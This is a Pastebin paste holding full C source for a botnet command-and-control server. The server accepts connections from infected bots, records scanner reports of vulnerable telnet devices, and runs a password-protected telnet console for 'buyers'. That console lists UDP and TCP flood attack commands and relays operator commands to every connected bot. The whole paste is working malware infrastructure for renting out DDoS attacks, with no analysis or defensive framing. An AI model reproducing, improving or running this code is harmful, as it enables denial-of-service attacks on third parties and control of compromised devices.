API tools faq
paste
Guest User

Untitled

a guest
Jul 22nd, 2016
72
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.48 KB | None | 0 0
raw download clone embed print report
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. #include <sys/types.h>
  5. #include <sys/socket.h>
  6. #include <netdb.h>
  7. #include <unistd.h>
  8. #include <time.h>
  9. #include <fcntl.h>
  10. #include <sys/epoll.h>
  11. #include <errno.h>
  12. #include <pthread.h>
  13. #include <signal.h>
  14.  
  15. ////////////////////////////////////
  16. #define MY_MGM_PORT 7362
  17. #define MAXFDS 1000000 //max amount of bots, near impossible to reach this amount.
  18. ////////////////////////////////////
  19.  
  20.  
  21. struct account {
  22. char id[20];
  23. char password[20];
  24. };
  25. static struct account accounts[10];
  26.  
  27. struct clientdata_t {
  28. uint32_t ip;
  29. char build[7];
  30. char connected;
  31. } clients[MAXFDS];
  32.  
  33. struct telnetdata_t {
  34. int connected;
  35. } managements[MAXFDS];
  36.  
  37.  
  38.  
  39. ////////////////////////////////////
  40.  
  41.  
  42. static volatile FILE *telFD;
  43. static volatile FILE *fileFD;
  44. static volatile int epollFD = 0;
  45. static volatile int listenFD = 0;
  46. static volatile int managesConnected = 0;
  47. static volatile int TELFound = 0;
  48. static volatile int scannerreport;
  49.  
  50.  
  51. ////////////////////////////////////
  52.  
  53.  
  54. int fdgets(unsigned char *buffer, int bufferSize, int fd)
  55. {
  56. int total = 0, got = 1;
  57. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
  58. return got;
  59. }
  60. void trim(char *str)
  61. {
  62. int i;
  63. int begin = 0;
  64. int end = strlen(str) - 1;
  65. while (isspace(str[begin])) begin++;
  66. while ((end >= begin) && isspace(str[end])) end--;
  67. for (i = begin; i <= end; i++) str[i - begin] = str[i];
  68. str[i - begin] = '\0';
  69. }
  70.  
  71.  
  72. static int make_socket_non_blocking (int sfd)
  73. {
  74. int flags, s;
  75. flags = fcntl (sfd, F_GETFL, 0);
  76. if (flags == -1)
  77. {
  78. perror ("fcntl");
  79. return -1;
  80. }
  81. flags |= O_NONBLOCK;
  82. s = fcntl (sfd, F_SETFL, flags);
  83. if (s == -1)
  84. {
  85. perror ("fcntl");
  86. return -1;
  87. }
  88. return 0;
  89. }
  90.  
  91.  
  92. static int create_and_bind (char *port)
  93. {
  94. struct addrinfo hints;
  95. struct addrinfo *result, *rp;
  96. int s, sfd;
  97. memset (&hints, 0, sizeof (struct addrinfo));
  98. hints.ai_family = AF_UNSPEC;
  99. hints.ai_socktype = SOCK_STREAM;
  100. hints.ai_flags = AI_PASSIVE;
  101. s = getaddrinfo (NULL, port, &hints, &result);
  102. if (s != 0)
  103. {
  104. fprintf (stderr, "getaddrinfo: %s\n", gai_strerror (s));
  105. return -1;
  106. }
  107. for (rp = result; rp != NULL; rp = rp->ai_next)
  108. {
  109. sfd = socket (rp->ai_family, rp->ai_socktype, rp->ai_protocol);
  110. if (sfd == -1) continue;
  111. int yes = 1;
  112. if ( setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1 ) perror("setsockopt");
  113. s = bind (sfd, rp->ai_addr, rp->ai_addrlen);
  114. if (s == 0)
  115. {
  116. break;
  117. }
  118. close (sfd);
  119. }
  120. if (rp == NULL)
  121. {
  122. fprintf (stderr, "Could not bind\n");
  123. return -1;
  124. }
  125. freeaddrinfo (result);
  126. return sfd;
  127. }
  128. void broadcast(char *msg, int us)
  129. {
  130. int sendMGM = 1;
  131. if(strcmp(msg, "PING") == 0) sendMGM = 0;
  132. char *wot = malloc(strlen(msg) + 10);
  133. memset(wot, 0, strlen(msg) + 10);
  134. strcpy(wot, msg);
  135. trim(wot);
  136. time_t rawtime;
  137. struct tm * timeinfo;
  138. time(&rawtime);
  139. timeinfo = localtime(&rawtime);
  140. char *timestamp = asctime(timeinfo);
  141. trim(timestamp);
  142. int i;
  143. for(i = 0; i < MAXFDS; i++)
  144. {
  145. if(i == us || (!clients[i].connected && (sendMGM == 0 || !managements[i].connected))) continue;
  146. if(sendMGM && managements[i].connected)
  147. {
  148. send(i, "\x1b[32m", 5, MSG_NOSIGNAL);
  149. send(i, timestamp, strlen(timestamp), MSG_NOSIGNAL);
  150. send(i, ": ", 2, MSG_NOSIGNAL);
  151. }
  152. printf("sent to fd: %d\n", i);
  153. send(i, msg, strlen(msg), MSG_NOSIGNAL);
  154. if(sendMGM && managements[i].connected) send(i, "\r\n\x1b[32m> \x1b[0m", 13, MSG_NOSIGNAL);
  155. else send(i, "\n", 1, MSG_NOSIGNAL);
  156. }
  157. free(wot);
  158. }
  159.  
  160. void *epollEventLoop(void *useless)
  161. {
  162. struct epoll_event event;
  163. struct epoll_event *events;
  164. int s;
  165. events = calloc (MAXFDS, sizeof event);
  166. while (1)
  167. {
  168. int n, i;
  169. n = epoll_wait (epollFD, events, MAXFDS, -1);
  170. for (i = 0; i < n; i++)
  171. {
  172. if ((events[i].events & EPOLLERR) || (events[i].events & EPOLLHUP) || (!(events[i].events & EPOLLIN)))
  173. {
  174. clients[events[i].data.fd].connected = 0;
  175. close(events[i].data.fd);
  176. continue;
  177. }
  178. else if (listenFD == events[i].data.fd)
  179. {
  180. while (1)
  181. {
  182. struct sockaddr in_addr;
  183. socklen_t in_len;
  184. int infd, ipIndex;
  185.  
  186. in_len = sizeof in_addr;
  187. infd = accept (listenFD, &in_addr, &in_len);
  188. if (infd == -1)
  189. {
  190. if ((errno == EAGAIN) || (errno == EWOULDBLOCK)) break;
  191. else
  192. {
  193. perror ("accept");
  194. break;
  195. }
  196. }
  197.  
  198. s = make_socket_non_blocking (infd);
  199. if (s == -1) { close(infd); break; }
  200.  
  201. event.data.fd = infd;
  202. event.events = EPOLLIN | EPOLLET;
  203. s = epoll_ctl (epollFD, EPOLL_CTL_ADD, infd, &event);
  204. if (s == -1)
  205. {
  206. perror ("epoll_ctl");
  207. close(infd);
  208. break;
  209. }
  210.  
  211. clients[infd].connected = 1;
  212. send(infd, "!* SCANNER OFF\n", 15, MSG_NOSIGNAL);
  213. }
  214. continue;
  215. }
  216. else
  217. {
  218. int thefd = events[i].data.fd;
  219. struct clientdata_t *client = &(clients[thefd]);
  220. int done = 0;
  221. client->connected = 1;
  222. while (1)
  223. {
  224. ssize_t count;
  225. char buf[2048];
  226. memset(buf, 0, sizeof buf);
  227.  
  228. while(memset(buf, 0, sizeof buf) && (count = fdgets(buf, sizeof buf, thefd)) > 0)
  229. {
  230. if(strstr(buf, "\n") == NULL) { done = 1; break; }
  231. trim(buf);
  232. if(strcmp(buf, "PING") == 0) // basic IRC-like ping/pong challenge/response to see if server is alive
  233. {
  234. if(send(thefd, "PONG\n", 5, MSG_NOSIGNAL) == -1) { done = 1; break; } // response
  235. continue;
  236. }
  237. if(strstr(buf, "REPORT ") == buf) // received a report of a vulnerable system from a scan
  238. {
  239. char *line = strstr(buf, "REPORT ") + 7;
  240. fprintf(telFD, "%s\n", line); // let's write it out to disk without checking what it is!
  241. fflush(telFD);
  242. TELFound++;
  243. continue;
  244. }
  245. if(strstr(buf, "SCANNER STARTED!") == buf)
  246. {
  247. char *line = strstr(buf, "SCANNER STARTED!");
  248. scannerreport = 1;
  249. continue;
  250. }
  251. if(strstr(buf, "SCANNER STOPPED!") == buf)
  252. {
  253. char *line = strstr(buf, "SCANNER STOPPED!");
  254. scannerreport--;
  255. continue;
  256. }
  257. if(strcmp(buf, "PONG") == 0)
  258. {
  259. continue;
  260. }
  261.  
  262. printf("buf: \"%s\"\n", buf);
  263. }
  264.  
  265. if (count == -1)
  266. {
  267. if (errno != EAGAIN)
  268. {
  269. done = 1;
  270. }
  271. break;
  272. }
  273. else if (count == 0)
  274. {
  275. done = 1;
  276. break;
  277. }
  278. }
  279.  
  280. if (done)
  281. {
  282. client->connected = 0;
  283. close(thefd);
  284. }
  285. }
  286. }
  287. }
  288. }
  289.  
  290. unsigned int clientsConnected()
  291. {
  292. int i = 0, total = 0;
  293. for(i = 0; i < MAXFDS; i++)
  294. {
  295. if(!clients[i].connected) continue;
  296. total++;
  297. }
  298.  
  299. return total;
  300. }
  301.  
  302. void *titleWriter(void *sock)
  303. {
  304. int thefd = (int)sock;
  305. char string[2048];
  306. while(1)
  307. {
  308. memset(string, 0, 2048);
  309. sprintf(string, "%c]0;Bot's connected: %d | Buyer's connected: %d%c", '\033', clientsConnected(), managesConnected, '\007');
  310. // \007 is a bell character... causes a beep. Why is there a beep here?
  311. if(send(thefd, string, strlen(string), MSG_NOSIGNAL) == -1) return;
  312.  
  313. sleep(2);
  314. }
  315. }
  316.  
  317. int Search_in_File(char *str)
  318. {
  319. FILE *fp;
  320. int line_num = 0;
  321. int find_result = 0, find_line=0;
  322. char temp[512];
  323.  
  324. if((fp = fopen("login.txt", "r")) == NULL){
  325. return(-1);
  326. }
  327. while(fgets(temp, 512, fp) != NULL){
  328. if((strstr(temp, str)) != NULL){
  329. find_result++;
  330. find_line = line_num;
  331. }
  332. line_num++;
  333. }
  334. if(fp)
  335. fclose(fp);
  336.  
  337. if(find_result == 0)return 0;
  338.  
  339. return find_line;
  340. }
  341.  
  342. void *telnetWorker(void *sock)
  343. {
  344. int thefd = (int)sock;
  345. int find_line;
  346. managesConnected++;
  347. pthread_t title;
  348. char counter[2048];
  349. memset(counter, 0, 2048);
  350. char buf[2048];
  351. char* nickstring;
  352. char* username;
  353. char* password;
  354. memset(buf, 0, sizeof buf);
  355. char botnet[2048];
  356. memset(botnet, 0, 2048);
  357.  
  358. FILE *fp;
  359. int i=0;
  360. int c;
  361. fp=fopen("login.txt", "r"); // format: user pass
  362. while(!feof(fp))
  363. {
  364. c=fgetc(fp);
  365. ++i;
  366. }
  367. int j=0;
  368. rewind(fp);
  369. while(j!=i-1)
  370. {
  371. fscanf(fp, "%s %s", accounts[j].id, accounts[j].password);
  372. ++j;
  373. }
  374.  
  375. if(send(thefd, "\x1b[30mUsername:\x1b[30m ", 22, MSG_NOSIGNAL) == -1) goto end;
  376. if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
  377. trim(buf);
  378. nickstring = ("%s", buf);
  379. find_line = Search_in_File(nickstring);
  380. if(strcmp(nickstring, accounts[find_line].id) == 0){
  381. if(send(thefd, "\x1b[30mPassword:\x1b[30m ", 22, MSG_NOSIGNAL) == -1) goto end;
  382. if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
  383. trim(buf);
  384. if(strcmp(buf, accounts[find_line].password) != 0) goto failed;
  385. memset(buf, 0, 2048);
  386. goto fak;
  387. }
  388. failed:
  389. if(send(thefd, "\033[1A", 5, MSG_NOSIGNAL) == -1) goto end;
  390. if(send(thefd, "\x1b[32m****************************************\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
  391. if(send(thefd, "\x1b[32m* INVALID CREDENTIALS *\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
  392. if(send(thefd, "\x1b[32m* GTFO MY NET BITCH :) *\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
  393. if(send(thefd, "\x1b[32m****************************************\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
  394. sleep(5);
  395. goto end;
  396. fak:
  397. pthread_create(&title, NULL, &titleWriter, sock);
  398. if(send(thefd, "\x1b[1m\x1b[34m*******************************************\r\n", 54, MSG_NOSIGNAL) == -1) goto end;
  399. if(send(thefd, "*\x1b[36m @WELCOME CLIENTS ENJOY YOUR STAY@\x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
  400. if(send(thefd, "*\x1b[33m-----------------------------------------\x1b[33m*\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
  401. if(send(thefd, "* \x1b[36m @ATTACK COMMANDS@\x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
  402. if(send(thefd, "* \x1b[32mudp flood = ! udp ip port time 32 syn\x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
  403. if(send(thefd, "* \x1b[31mtcp flood = ! tcp ip port time 32 syn\x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
  404. if(send(thefd, "* \x1b[36m @STOP ATTACK COMMANDS@\x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
  405. if(send(thefd, "* \x1b[32m! killattk\x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
  406. if(send(thefd, "*\x1b[33m-----------------------------------------\x1b[33m*\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
  407. if(send(thefd, "* \x1b[36m @TELNET COMMANDS@\x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
  408. if(send(thefd, "* \x1b[32mtype bots to view the number of bots!\x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
  409. if(send(thefd, "* \x1b[31mtype status to view the number of \x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
  410. if(send(thefd, "* \x1b[36mtelnet devices found! \x1b[37m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
  411. if(send(thefd, "*\x1b[33m-----------------------------------------\x1b[33m*\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
  412. if(send(thefd, "*******************************************\r\n\r\n\x1b[34m| \x1b[34m", 59, MSG_NOSIGNAL) == -1) goto end;
  413. pthread_create(&title, NULL, &titleWriter, sock);
  414. managements[thefd].connected = 1;
  415.  
  416. while(fdgets(buf, sizeof buf, thefd) > 0)
  417. {
  418. if(strstr(buf, "status"))
  419. {
  420. sprintf(botnet, "Telnet devices: %d | Telnet status: %d\r\n", TELFound, scannerreport);
  421. if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return;
  422. }
  423. if(strstr(buf, "bots"))
  424. {
  425. sprintf(botnet, "Bots connected: %d\r\n", clientsConnected(), managesConnected);
  426. if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return;
  427. }
  428. trim(buf);
  429. if(send(thefd, "\x1b[31m> \x1b[0m", 11, MSG_NOSIGNAL) == -1) goto end;
  430. if(strlen(buf) == 0) continue;
  431. printf("%s: \"%s\"\n",accounts[find_line].id, buf);
  432. FILE *logFile;
  433. logFile = fopen("server.log", "a");
  434. fprintf(logFile, "%s: \"%s\"\n",accounts[find_line].id, buf);
  435. fclose(logFile);
  436. broadcast(buf, thefd);
  437. memset(buf, 0, 2048);
  438. }
  439.  
  440. end: // cleanup dead socket
  441. managements[thefd].connected = 0;
  442. close(thefd);
  443. managesConnected--;
  444. }
  445.  
  446. void *telnetListener(void *useless)
  447. {
  448. int sockfd, newsockfd;
  449. socklen_t clilen;
  450. struct sockaddr_in serv_addr, cli_addr;
  451. sockfd = socket(AF_INET, SOCK_STREAM, 0);
  452. if (sockfd < 0) perror("ERROR opening socket");
  453. bzero((char *) &serv_addr, sizeof(serv_addr));
  454. serv_addr.sin_family = AF_INET;
  455. serv_addr.sin_addr.s_addr = INADDR_ANY;
  456. serv_addr.sin_port = htons(MY_MGM_PORT);
  457. if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) perror("ERROR on binding");
  458. listen(sockfd,5);
  459. clilen = sizeof(cli_addr);
  460. while(1)
  461. {
  462. newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);
  463. if (newsockfd < 0) perror("ERROR on accept");
  464. pthread_t thread;
  465. pthread_create( &thread, NULL, &telnetWorker, (void *)newsockfd);
  466. }
  467. }
  468.  
  469. int main (int argc, char *argv[], void *sock)
  470. {
  471. signal(SIGPIPE, SIG_IGN); // ignore broken pipe errors sent from kernel
  472.  
  473. int s, threads;
  474. struct epoll_event event;
  475.  
  476. if (argc != 3)
  477. {
  478. fprintf (stderr, "Usage: %s [port] [threads]\n", argv[0]);
  479. exit (EXIT_FAILURE);
  480. }
  481. telFD = fopen("telnet.txt", "a+");
  482. threads = atoi(argv[2]);
  483.  
  484. listenFD = create_and_bind (argv[1]); // try to create a listening socket, die if we can't
  485. if (listenFD == -1) abort ();
  486.  
  487. s = make_socket_non_blocking (listenFD); // try to make it nonblocking, die if we can't
  488. if (s == -1) abort ();
  489.  
  490. s = listen (listenFD, SOMAXCONN); // listen with a huuuuge backlog, die if we can't
  491. if (s == -1)
  492. {
  493. perror ("listen");
  494. abort ();
  495. }
  496.  
  497. epollFD = epoll_create1 (0); // make an epoll listener, die if we can't
  498. if (epollFD == -1)
  499. {
  500. perror ("epoll_create");
  501. abort ();
  502. }
  503.  
  504. event.data.fd = listenFD;
  505. event.events = EPOLLIN | EPOLLET;
  506. s = epoll_ctl (epollFD, EPOLL_CTL_ADD, listenFD, &event);
  507. if (s == -1)
  508. {
  509. perror ("epoll_ctl");
  510. abort ();
  511. }
  512.  
  513. pthread_t thread[threads + 2];
  514. while(threads--)
  515. {
  516. pthread_create( &thread[threads + 1], NULL, &epollEventLoop, (void *) NULL); // make a thread to command each bot individually
  517. }
  518.  
  519. pthread_create(&thread[0], NULL, &telnetListener, (void *)NULL);
  520.  
  521. while(1)
  522. {
  523. broadcast("PING", -1); // ping bots every 60 sec on the main thread
  524. sleep(60);
  525. }
  526.  
  527. close (listenFD);
  528.  
  529. return EXIT_SUCCESS;
  530. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!